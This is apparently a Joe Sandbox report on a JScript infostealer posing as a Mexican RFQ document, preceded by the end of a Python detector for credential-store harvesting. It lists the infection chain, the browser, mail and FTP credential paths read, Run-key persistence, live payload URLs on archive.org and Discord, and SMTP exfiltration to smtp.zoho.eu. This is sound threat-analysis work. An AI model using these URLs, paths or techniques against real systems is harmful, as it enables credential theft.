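    ("InstallUtil.exe", 1632, "file", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    ("InstallUtil.exe", 1632, "file", r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data"),
    ("InstallUtil.exe", 1632, "file", r"C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini"),
    ("InstallUtil.exe", 1632, "file", r"C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini"),
    ("InstallUtil.exe", 1632, "file", r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini"),
    ("InstallUtil.exe", 1632, "file", r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies"),
    ("InstallUtil.exe", 1632, "file", r"C:\FTP Navigator\Ftplist.txt"),
    ("InstallUtil.exe", 1632, "file", r"C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini"),
    ("InstallUtil.exe", 1632, "key", r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles"),
    ("InstallUtil.exe", 1632, "key", r"HKEY_CURRENT_USER\Software\IncrediMail\Identities"),
    # Benign noise (constructed): the browser reading its own store.
    ("chrome.exe", 4242, "file", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
]


def classify(path: str):
    """Return the credential-store family a path or key belongs to, or None."""
    for category, patterns in CREDENTIAL_STORES.items():
        if any(re.search(p, path, re.IGNORECASE) for p in patterns):
            return category
    return None


def find_credential_harvesters(events, min_categories=2):
    """Flag processes that touch stores of at least `min_categories`
    different families, ignoring each store's own client.  One family might
    be a backup job or a browser migration; an unrelated binary sweeping
    browsers AND mail AND FTP clients is the stealer pattern."""
    touched = defaultdict(lambda: defaultdict(set))
    for proc, pid, _kind, path in events:
        category = classify(path)
        if category is None or OWNERS.get(proc.lower()) == category:
            continue
        touched[(proc, pid)][category].add(path)
    alerts = []
    for (proc, pid), cats in touched.items():
        if len(cats) >= min_categories:
            alerts.append({
                "process": proc,
                "pid": pid,
                "categories": sorted(cats),
                "count": sum(len(paths) for paths in cats.values()),
            })
    return alerts


if __name__ == "__main__":
    for alert in find_credential_harvesters(SAMPLE_EVENTS):
        print(alert)
```

                      On the constructed events the only alert is InstallUtil.exe PID 1632 with all three families and thirteen distinct stores; the Chrome event is dropped by the owner exemption. In production the event feed would be Sysmon Event ID 11/13 or EDR file-read telemetry, and the owner table needs the estate's real clients, otherwise a legitimate password manager will trip it.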

                      Remote Access Functionality

                      Source: Yara match | File source: 4.2.powershell.exe.1ce9038cb90.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 8.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.powershell.exe.1ce9038cb90.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000008.00000002.3317780029.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000008.00000002.3317780029.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000008.00000002.3317780029.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000002.2121822566.000001CE9033B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000008.00000002.3314034546.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: powershell.exe PID: 1964, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 1632, type: MEMORYSTR
                      MITRE ATT&CK Matrix (techniques listed per tactic column; leading numbers are the count badges carried over from the original matrix)

                      Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
                      Resource Development: 22 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
                      Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
                      Execution: 231 Windows Management Instrumentation; 1 Exploitation for Client Execution; 11 Command and Scripting Interpreter; 3 PowerShell; Launchd; Scheduled Task; Systemd Timers
                      Persistence: 22 Scripting; 1 DLL Side-Loading; 11 Registry Run Keys / Startup Folder; Login Hook; Network Logon Script; RC Scripts; Startup Items
                      Privilege Escalation: 1 DLL Side-Loading; 211 Process Injection; 11 Registry Run Keys / Startup Folder; Login Hook; Network Logon Script; RC Scripts; Startup Items
                      Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; 261 Virtualization/Sandbox Evasion; 211 Process Injection
                      Credential Access: 2 OS Credential Dumping; 1 Input Capture; 1 Credentials in Registry; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
                      Discovery: 1 File and Directory Discovery; 34 System Information Discovery; 531 Security Software Discovery; 1 Process Discovery; 261 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery
                      Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
                      Collection: 11 Archive Collected Data; 2 Data from Local System; 1 Email Collection; 1 Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
                      Command and Control: 1 Ingress Tool Transfer; 11 Encrypted Channel; 1 Non-Standard Port; 2 Non-Application Layer Protocol; 13 Application Layer Protocol; Multiband Communication; Commonly Used Port
                      Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
                      Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
Behavior Graph ID: 1499556
Sample: RFQ448903423_MAT_HASUE_de_M...
Startdate: 27/08/2024
Architecture: WINDOWS
Score: 100

Process tree from the behavior graph (numbers after a process name are the legend's count badges: created registry values / created files):

Sample (root)
  DNS/IP: smtp.zoho.eu; ip-api.com; 2 other IPs or domains
  Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 14 other signatures
  Started: wscript.exe (1 1)

wscript.exe (1 1)
  Signatures: JScript performs obfuscated calls to suspicious functions; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 4 other signatures
  Started: powershell.exe (7)

powershell.exe (7)
  Signatures: Suspicious powershell command line found; Found suspicious powershell code related to unpacking or dynamic code loading
  Started: powershell.exe (15 16); conhost.exe

powershell.exe (15 16)
  DNS/IP: ia601606.us.archive.org 207.241.227.86, 443, 49704 INTERNET-ARCHIVEUS United States; cdn.discordapp.com 162.159.135.233, 443, 49705 CLOUDFLARENETUS United States
  Signatures: Creates autostart registry keys with suspicious values (likely registry only malware); Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Writes to foreign memory regions; Injects a PE file into a foreign processes
  Started: InstallUtil.exe (15 2); InstallUtil.exe; cmd.exe (1)

InstallUtil.exe (15 2)
  DNS/IP: ip-api.com 208.95.112.1, 49706, 80 TUT-ASUS United States; smtp.zoho.eu 185.230.212.164, 49707, 49708, 587 COMPUTERLINEComputerlineSchlierbachSwitzerlandCH Netherlands
  Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc)

InstallUtil.exe
  Signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

cmd.exe (1)
  Started: conhost.exe

Source | Detection | Scanner | Label | Link
RFQ448903423_MAT_HASUE_de_Mexico.js | 11% | ReversingLabs | |
RFQ448903423_MAT_HASUE_de_Mexico.js | 14% | Virustotal | | Browse

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label | Link
smtp.zoho.eu | 0% | Virustotal | | Browse
ia601606.us.archive.org | 0% | Virustotal | | Browse
cdn.discordapp.com | 1% | Virustotal | | Browse
ip-api.com | 0% | Virustotal | | Browse

Source | Detection | Scanner | Label | Link
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
https://account.dyn.com/ | 0% | URL Reputation | safe |
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
https://go.micro | 0% | URL Reputation | safe |
https://contoso.com/License | 0% | URL Reputation | safe |
https://contoso.com/Icon | 0% | URL Reputation | safe |
https://aka.ms/pscore6 | 0% | URL Reputation | safe |
https://contoso.com/ | 0% | URL Reputation | safe |
https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
http://ip-api.com | 0% | URL Reputation | safe |
https://oneget.orgX | 0% | URL Reputation | safe |
https://aka.ms/pscore68 | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
http://crl.v | 0% | URL Reputation | safe |
https://oneget.org | 0% | URL Reputation | safe |
http://ip-api.com/line/?fields=hosting | 0% | URL Reputation | safe |
https://ia601606.us.arXR( | 0% | Avira URL Cloud | safe |
http://www.apache.org/licenses/LICENSE-2.0 | 0% | Avira URL Cloud | safe |
https://cdn.discordapp.com/attachments/1277433180093157459/1277662781419552829/ORIG.txt?ex=66cdfbb0& | 0% | Avira URL Cloud | safe |
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Avira URL Cloud | safe |
http://cdp.thawte.com/ThawteTLSRSACAG1.crl0p | 0% | Avira URL Cloud | safe |
https://cdn.discordapp.com | 0% | Avira URL Cloud | safe |
http://www.apache.org/licenses/LICENSE-2.0.html0 | 0% | Avira URL Cloud | safe |
https://ia601606.us.archive.org/10/items/deathnote | 0% | Avira URL Cloud | safe |
http://cdp.thawte.com/ThawteTLSRSACAG1.crl0p | 0% | Virustotal | | Browse
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Virustotal | | Browse
https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg | 100% | Avira URL Cloud | malware |
http://www.apache.org/licenses/LICENSE-2.0.html0 | 0% | Virustotal | | Browse
http://cacerts.thawte.com/ThawteTLSRSACAG1.crt0 | 0% | Avira URL Cloud | safe |
https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe |
http://smtp.zoho.eu | 0% | Avira URL Cloud | safe |
https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg | 4% | Virustotal | | Browse
https://cdn.discordapp.com/attachments/1277433180093157459/1277662781419552829/ORIG.txt?ex=66cdfbb0&is=66ccaa30&hm=d1c475c40c3b46b0e27e96cbd9d311f2634d5d9ee85c92712f601947bf5e518f& | 0% | Avira URL Cloud | safe |
http://www.apache.org/licenses/LICENSE-2.0 | 0% | Virustotal | | Browse
https://cdn.discordapp.com | 1% | Virustotal | | Browse
https://ia601606.us.archive.org/10/items/deathnote | 0% | Virustotal | | Browse
http://status.thawte.com0: | 0% | Avira URL Cloud | safe |
http://smtp.zoho.eu | 0% | Virustotal | | Browse
http://cdn.discordapp.com | 0% | Avira URL Cloud | safe |
http://ia601606.us.archive.org | 0% | Avira URL Cloud | safe |
https://ia601606.us.archive.org | 0% | Avira URL Cloud | safe |
https://github.com/Pester/Pester | 1% | Virustotal | | Browse
http://cdn.discordapp.com | 1% | Virustotal | | Browse
https://ia601606.us.archive.org | 0% | Virustotal | | Browse
http://ia601606.us.archive.org | 0% | Virustotal | | Browse
http://cacerts.thawte.com/ThawteTLSRSACAG1.crt0 | 0% | Virustotal | | Browse
Name | IP | Active | Malicious | Antivirus Detection | Reputation
smtp.zoho.eu | 185.230.212.164 | true | true | | unknown
ia601606.us.archive.org | 207.241.227.86 | true | true | | unknown
cdn.discordapp.com | 162.159.135.233 | true | true | | unknown
ip-api.com | 208.95.112.1 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg | true | 4%, Virustotal, Browse; Avira URL Cloud: malware | unknown
https://cdn.discordapp.com/attachments/1277433180093157459/1277662781419552829/ORIG.txt?ex=66cdfbb0&is=66ccaa30&hm=d1c475c40c3b46b0e27e96cbd9d311f2634d5d9ee85c92712f601947bf5e518f& | true | Avira URL Cloud: safe | unknown
http://ip-api.com/line/?fields=hosting | false | URL Reputation: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000004.00000002.2105359169.000001CE819FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0 | powershell.exe, 00000004.00000002.2105359169.000001CE81680000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://account.dyn.com/ | powershell.exe, 00000004.00000002.2121822566.000001CE9033B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3314034546.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ia601606.us.arXR( | powershell.exe, 00000004.00000002.2105359169.000001CE80F7C000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000004.00000002.2105359169.000001CE8188A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2105359169.000001CE81680000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn.discordapp.com/attachments/1277433180093157459/1277662781419552829/ORIG.txt?ex=66cdfbb0& | powershell.exe, 00000004.00000002.2105359169.000001CE80439000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000004.00000002.2105359169.000001CE8188A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2105359169.000001CE81680000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://go.micro | powershell.exe, 00000004.00000002.2105359169.000001CE80F7C000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://cdp.thawte.com/ThawteTLSRSACAG1.crl0p | InstallUtil.exe, 00000008.00000002.3317780029.0000000002A44000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3330752912.0000000005AFE000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3315900274.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3317780029.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3330752912.0000000005AA5000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://contoso.com/License | powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/pscore6 | powershell.exe, 00000002.00000002.2153683025.000001DCD521A000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn.discordapp.com | powershell.exe, 00000004.00000002.2105359169.000001CE80439000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html0 | powershell.exe, 00000004.00000002.2105359169.000001CE8188A000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://ia601606.us.archive.org/10/items/deathnote | powershell.exe, 00000002.00000002.2153683025.000001DCD5A1F000.00000004.00000800.00020000.00000000.sdmp | true | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://cacerts.thawte.com/ThawteTLSRSACAG1.crt0 | InstallUtil.exe, 00000008.00000002.3317780029.0000000002A44000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3330752912.0000000005AFE000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3315900274.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3317780029.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3330752912.0000000005AA5000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000004.00000002.2105359169.000001CE8188A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2105359169.000001CE81680000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://smtp.zoho.eu | InstallUtil.exe, 00000008.00000002.3317780029.0000000002A44000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3317780029.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://status.thawte.com0: | InstallUtil.exe, 00000008.00000002.3317780029.0000000002A44000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3330752912.0000000005AFE000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3315900274.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3317780029.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3330752912.0000000005AA5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://cdn.discordapp.com | powershell.exe, 00000004.00000002.2105359169.000001CE80553000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000004.00000002.2105359169.000001CE819FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ip-api.com | InstallUtil.exe, 00000008.00000002.3317780029.00000000029E1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://oneget.orgX | powershell.exe, 00000004.00000002.2105359169.000001CE81680000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000002.00000002.2153683025.000001DCD525F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2105359169.000001CE80001000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.2153683025.000001DCD5291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2105359169.000001CE80001000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3317780029.00000000029E1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.v | powershell.exe, 00000004.00000002.2143156846.000001CEE960F000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ia601606.us.archive.org | powershell.exe, 00000004.00000002.2105359169.000001CE81638000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://oneget.org | powershell.exe, 00000004.00000002.2105359169.000001CE81680000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ia601606.us.archive.org | powershell.exe, 00000004.00000002.2105359169.000001CE80223000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2105359169.000001CE80F7C000.00000004.00000800.00020000.00000000.sdmp | true | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
207.241.227.86 | ia601606.us.archive.org | United States | 7941 | INTERNET-ARCHIVEUS | true
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | true
185.230.212.164 | smtp.zoho.eu | Netherlands | 41913 | COMPUTERLINEComputerlineSchlierbachSwitzerlandCH | true
162.159.135.233 | cdn.discordapp.com | United States | 13335 | CLOUDFLARENETUS | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1499556
Start date and time: 2024-08-27 07:52:49 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 28s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: RFQ448903423_MAT_HASUE_de_Mexico.js
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winJS@13/5@4/4
EGA Information:
• Successful, ratio: 66.7%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 81
• Number of non-executed functions: 7
Cookbook Comments:
• Found application associated with file extension: .js
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 768 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
01:53:40 | API Interceptor | 41x Sleep call for process: powershell.exe modified
01:53:47 | API Interceptor | 58x Sleep call for process: InstallUtil.exe modified
07:53:46 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\padral.js
07:53:55 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\padral.js
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
207.241.227.86 | INQUIRY#46789-AUG24.js | Get hash | malicious | Remcos | Browse |
 | Comprovante_Swift.xlam.xlsx | Get hash | malicious | AgentTesla | Browse |
 | Shipping Documents.js | Get hash | malicious | Remcos | Browse |
 | shipping documents.js | Get hash | malicious | Unknown | Browse |
 | 27256APPROVEDACHpmt187023OI2783764.js | Get hash | malicious | Unknown | Browse |
 | DHL-66445735750-DHL-66445735750-DHL-66445735750.js | Get hash | malicious | Remcos | Browse |
 | 15514541_Doc_Sub(C-A0893)10-08-2024.js | Get hash | malicious | Unknown | Browse |
 | Return_shipping_label.js | Get hash | malicious | Unknown | Browse |
 | INVOICE.js | Get hash | malicious | StormKitty, XWorm | Browse |
 | doc_1000050408072024.js | Get hash | malicious | Remcos | Browse |
208.95.112.1 | cotizaci#U00f3n_SIS20240500007257.pdf.exe | Get hash | malicious | AgentTesla | Browse | ip-api.com/line/?fields=hosting
 | Recibo de env#U00edo de DHL_Gu#U00eda de embarque Doc_PRG211003417144356060.PDF..exe | Get hash | malicious | AgentTesla | Browse | ip-api.com/line/?fields=hosting
 | Image Logger Installer.exe | Get hash | malicious | AsyncRAT, XWorm | Browse | ip-api.com/line/?fields=hosting
 | Fatality.exe | Get hash | malicious | Blank Grabber, Umbral Stealer | Browse | ip-api.com/json/?fields=225545
 | smss.exe | Get hash | malicious | RMSRemoteAdmin, RDPWrap Tool, xRAT | Browse | ip-api.com/json
 | RFQ20240513.exe | Get hash | malicious | AgentTesla, DarkTortilla | Browse | ip-api.com/line/?fields=hosting
 | DOCUMENTOSFACTURA_pif.exe | Get hash | malicious | AgentTesla | Browse | ip-api.com/line/?fields=hosting
 | Payment Confirmation 26082024.exe | Get hash | malicious | AgentTesla | Browse | ip-api.com/line/?fields=hosting
 | crss.exe | Get hash | malicious | AsyncRAT, XWorm | Browse | ip-api.com/line/?fields=hosting
 | game.exe | Get hash | malicious | AsyncRAT, XWorm | Browse | ip-api.com/line/?fields=hosting
185.230.212.164 | File.com.exe | Get hash | malicious | DarkTortilla, Snake Keylogger, VIP Keylogger | Browse |
 | Pedido9456_muestras_material_JC_INDUSTRIAL_DE_MEXICO SA de CV.exe | Get hash | malicious | AgentTesla, DarkTortilla | Browse |
 | 1qwF1J2Njh.exe | Get hash | malicious | AgentTesla | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
ip-api.com | cotizaci#U00f3n_SIS20240500007257.pdf.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
 | Recibo de env#U00edo de DHL_Gu#U00eda de embarque Doc_PRG211003417144356060.PDF..exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
 | Image Logger Installer.exe | Get hash | malicious | AsyncRAT, XWorm | Browse | 208.95.112.1
 | Fatality.exe | Get hash | malicious | Blank Grabber, Umbral Stealer | Browse | 208.95.112.1
 | smss.exe | Get hash | malicious | RMSRemoteAdmin, RDPWrap Tool, xRAT | Browse | 208.95.112.1
 | https://jobs.exjudicata.com/senior-policy-manager-1a1406bf4189 | Get hash | malicious | Unknown | Browse | 51.77.64.70
 | RFQ20240513.exe | Get hash | malicious | AgentTesla, DarkTortilla | Browse | 208.95.112.1
 | DOCUMENTOSFACTURA_pif.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
 | Payment Confirmation 26082024.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
 | crss.exe | Get hash | malicious | AsyncRAT, XWorm | Browse | 208.95.112.1
cdn.discordapp.com | INQUIRY#46789-AUG24.js | Get hash | malicious | Remcos | Browse | 162.159.129.233
 | http://discord.openaiproxy.top/ | Get hash | malicious | Unknown | Browse | 162.159.133.233
 | REV#U0130ZE TEKL#U0130F_01.exe | Get hash | malicious | Unknown | Browse | 162.159.135.233
 | REV#U0130ZE TEKL#U0130F_01.exe | Get hash | malicious | Unknown | Browse | 162.159.130.233
 | quote.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 162.159.135.233
 | abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe | Get hash | malicious | CryptOne, Nymaim, PrivateLoader, RedLine, SmokeLoader, onlyLogger | Browse | 162.159.130.233
 | 3QKcKCEzYP.exe | Get hash | malicious | LummaC, Djvu, Go Injector, LummaC Stealer, Neoreklami, Stealc, SystemBC | Browse | 162.159.130.233
 | ExeFile (274).exe | Get hash | malicious | Unknown | Browse | 162.159.135.233
 | ExeFile (308).exe | Get hash | malicious | Unknown | Browse | 162.159.134.233
 | ExeFile (308).exe | Get hash | malicious | Unknown | Browse | 162.159.129.233
smtp.zoho.eu | File.com.exe | Get hash | malicious | DarkTortilla, Snake Keylogger, VIP Keylogger | Browse | 185.230.212.164
 | Pedido9456_muestras_material_JC_INDUSTRIAL_DE_MEXICO SA de CV.exe | Get hash | malicious | AgentTesla, DarkTortilla | Browse | 185.230.212.164
 | Orden#46789_2024_Optoflux_mexico_sderlss.exe | Get hash | malicious | AgentTesla, DarkTortilla | Browse | 185.230.214.164
 | Orden#46789_2024_Optoflux_mexico_sderlsTY.exe | Get hash | malicious | AgentTesla, DarkTortilla | Browse | 185.230.214.164
 | Orden#46789_2024_Optoflux_mexico_sderlsTYP.exe | Get hash | malicious | AgentTesla, DarkTortilla | Browse | 185.230.214.164
 | okPY77wv6E.exe | Get hash | malicious | AgentTesla | Browse | 185.230.214.164
 | RFQ678903423_PROD_HASUE_de_Mexicso_MAT_MEX.exe | Get hash | malicious | AgentTesla | Browse | 185.230.214.164
 | RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe | Get hash | malicious | GuLoader | Browse | 185.230.214.164
 | RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe | Get hash | malicious | AgentTesla | Browse | 185.230.214.164
 | INQUIRY#46789_MAY24_PLANEX_SERVICES_CONTRACTING_GOODS.exe | Get hash | malicious | AgentTesla | Browse | 185.230.214.164
ia601606.us.archive.org | INQUIRY#46789-AUG24.js | Get hash | malicious | Remcos | Browse | 207.241.227.86
 | Comprovante_Swift.xlam.xlsx | Get hash | malicious | AgentTesla | Browse | 207.241.227.86
 | Shipping Documents.js | Get hash | malicious | Remcos | Browse | 207.241.227.86
 | shipping documents.js | Get hash | malicious | Unknown | Browse | 207.241.227.86
 | 27256APPROVEDACHpmt187023OI2783764.js | Get hash | malicious | Unknown | Browse |
                                                • 207.241.227.86
                                                DHL-66445735750-DHL-66445735750-DHL-66445735750.jsGet hashmaliciousRemcosBrowse
